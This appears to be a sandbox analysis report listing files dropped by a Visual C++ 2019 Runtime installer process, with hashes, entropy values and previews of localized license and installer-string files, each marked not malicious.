Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive \| /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1031\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11936
Entropy (8bit):	5.194264396634094
Encrypted:	false
SSDEEP:	192:+XkOmRUOl6WBsl4kA+sn+mvtI0qHl4qj+iPqk6kVV9iX9GzYNvQ8yOejIpRMrhC2:DDHMFPCeV3i4zOHyOejIpkC2
MD5:	C2CFA4CE43DFF1FCD200EDD2B1212F0A
SHA1:	E8286E843192802E5EBF1BE67AE30BCAD75AC4BB
SHA-256:	F861DB23B972FAAA54520558810387D742878947057CF853DC74E5F6432E6A1B
SHA-512:	6FDF02A2DC9EF10DD52404F19C300429E7EA40469F00A43CA627F3B7F3868D1724450F99C65B70B9B7B1F2E1FA9D62B8BE1833A8C5AA3CD31C940459F359F30B
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBESTIMMUNGEN\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem mit Microsoft verbundenen Unternehmen). Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b SOFERN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, SIND SIE ZU FOLGENDEM BERECHTIGT:\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\tx360 RECHTE ZUR INSTALLATION UND NUTZUNG. \

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1031\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3379
Entropy (8bit):	5.094097800535488
Encrypted:	false
SSDEEP:	48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
MD5:	561F3F32DB2453647D1992D4D932E872
SHA1:	109548642FB7C5CC0159BEDDBCF7752B12B264C0
SHA-256:	8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
SHA-512:	CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive \| /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1036\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11593
Entropy (8bit):	5.106817099949188
Encrypted:	false
SSDEEP:	192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
MD5:	F0FF747B85B1088A317399B0E11D2101
SHA1:	F13902A39CEAE703A4713AC883D55CFEE5F1876C
SHA-256:	4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
SHA-512:	AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1036\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3366
Entropy (8bit):	5.0912204406356905
Encrypted:	false
SSDEEP:	48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
MD5:	7B46AE8698459830A0F9116BC27DE7DF
SHA1:	D9BB14D483B88996A591392AE03E245CAE19C6C3
SHA-256:	704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
SHA-512:	FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive \| /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1040\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	11281
Entropy (8bit):	5.046489958240229
Encrypted:	false
SSDEEP:	192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
MD5:	9D98044BAC59684489C4CF66C3B34C85
SHA1:	36AAE7F10A19D336C725CAFC8583B26D1F5E2325
SHA-256:	A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
SHA-512:	D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\p

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1040\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3319
Entropy (8bit):	5.019774955491369
Encrypted:	false
SSDEEP:	48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
MD5:	D90BC60FA15299925986A52861B8E5D5
SHA1:	FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
SHA-256:	0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
SHA-512:	11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive \| /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1041\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	28232
Entropy (8bit):	3.7669201853275722
Encrypted:	false
SSDEEP:	192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
MD5:	8C49936EC4CF0F64CA2398191C462698
SHA1:	CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
SHA-256:	7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
SHA-512:	4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset128 MS Gothic;}{\f1\fnil\fcharset0 MS Gothic;}{\f2\fnil\fcharset134 SimSun;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9\'83\'7d\'83\'43\'83\'4e\'83\'8d\'83\'5c\'83\'74\'83\'67 \'83\'5c\'83\'74\'83\'67\'83\'45\'83\'46\'83\'41 \'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\par..\f1 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f0\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8d\'80\'82\'cd\f2\'a1\'a2\f1 Microsoft Corporation (\f0\'82\'dc\'82\'bd\'82\'cd\'82\'a8\'8b\'71\'97\'6c\'82\'cc\'8f\'8a\'8d\'dd\'92\'6e\'82\'c9\'89\'9e\'82\'b6\'82\'c4\'82\'cd\'82\'bb\'82\'cc\'8a\'d6\'98\'41\'89\'ef\'8e\'d0) \'82\'c6\'82\'a8\'8b\'71\'97\'6c\'82\'c6\'82\'cc\'8c\'5f\'96\'f1\'82\'f0\'8d\'5c\'90\'ac\'82\'b5\'82\'dc\'82\'b7\'81\'42\'96\'7b\'83\'89\'83\'43\'83\'5a\'83\'93\'83\'58\'8f\'f0\'8

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1041\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3959
Entropy (8bit):	5.955167044943003
Encrypted:	false
SSDEEP:	96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
MD5:	DC81ED54FD28FC6DB6F139C8DA1BDED6
SHA1:	9C719C32844F78AAE523ADB8EE42A54D019C2B05
SHA-256:	6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
SHA-512:	FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ............ ......... .........................

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1042\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	27936
Entropy (8bit):	3.871317037004171
Encrypted:	false
SSDEEP:	384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
MD5:	184D94082717E684EAF081CEC3CBA4B1
SHA1:	960B9DA48F4CDDF29E78BBAE995B52204B26D51B
SHA-256:	A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
SHA-512:	E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset129 Malgun Gothic;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 Microsoft \f1\'bc\'d2\'c7\'c1\'c6\'ae\'bf\'fe\'be\'ee\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'bc\'ad\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'ba\'bb\f0 \f1\'bb\'e7\'bf\'eb\'b1\'c7\f0 \f1\'b0\'e8\'be\'e0\'c0\'ba\f0 Microsoft Corporation(\f1\'b6\'c7\'b4\'c2\f0 \f1\'b0\'c5\'c1\'d6\f0 \f1\'c1\'f6\'bf\'aa\'bf\'a1\f0 \f1\'b5\'fb\'b6\'f3\f0 \f1\'b0\'e8\'bf\'ad\'bb\'e7\f0 \f1\'c1\'df\f0 \f1\'c7\'cf\'b3\'aa\f0 )\f1\'b0\'fa\f0 \f1\'b1\'cd\'c7\'cf\f0 \f1\'b0\'a3\'bf\'a1\f0 \f1\'c3\'bc\'b0\'e1\'b5\'c7\'b4\'c2\f0 \f1\'b0\'e8\'be\'e0\'c0\'d4\'b4\'cf\'b4\'d9\f0 . \f1\'ba\'bb\f0 \f1\'c1\'b6\'b0\'c7\'c0\'ba\f0 \f1\'c0\'a7\'bf\'a1\f0 \f1\'b8\'ed\'bd\'c3\'b5\'c8\f0 \f1

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1042\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3249
Entropy (8bit):	5.985100495461761
Encrypted:	false
SSDEEP:	48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
MD5:	B3399648C2F30930487F20B50378CEC1
SHA1:	CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
SHA-256:	AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
SHA-512:	C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive \| /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1045\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13265
Entropy (8bit):	5.358483628484379
Encrypted:	false
SSDEEP:	192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
MD5:	5B9DF97FC98938BF2936437430E31ECA
SHA1:	AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
SHA-256:	8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
SHA-512:	4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1045\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3212
Entropy (8bit):	5.268378763359481
Encrypted:	false
SSDEEP:	48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
MD5:	15172EAF5C2C2E2B008DE04A250A62A1
SHA1:	ED60F870C473EE87DF39D1584880D964796E6888
SHA-256:	440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
SHA-512:	48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive \| /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1046\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	10656
Entropy (8bit):	5.092962528947159
Encrypted:	false
SSDEEP:	192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
MD5:	360FC4A7FFCDB915A7CF440221AFAD36
SHA1:	009F36BBDAD5B9972E8069E53855FC656EA05800
SHA-256:	9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
SHA-512:	9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Estes termos de licen\'e7a formam um contrato firmado entre a Microsoft Corporation (ou com base no seu pa\'eds de resid\'eancia, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\\pn\pnlvlblt\pnf2\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\sa120\sl240\slmult1\t

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1046\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3095
Entropy (8bit):	5.150868216959352
Encrypted:	false
SSDEEP:	48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
MD5:	BE27B98E086D2B8068B16DBF43E18D50
SHA1:	6FAF34A36C8D9DE55650D0466563852552927603
SHA-256:	F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
SHA-512:	3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
Malicious:	false
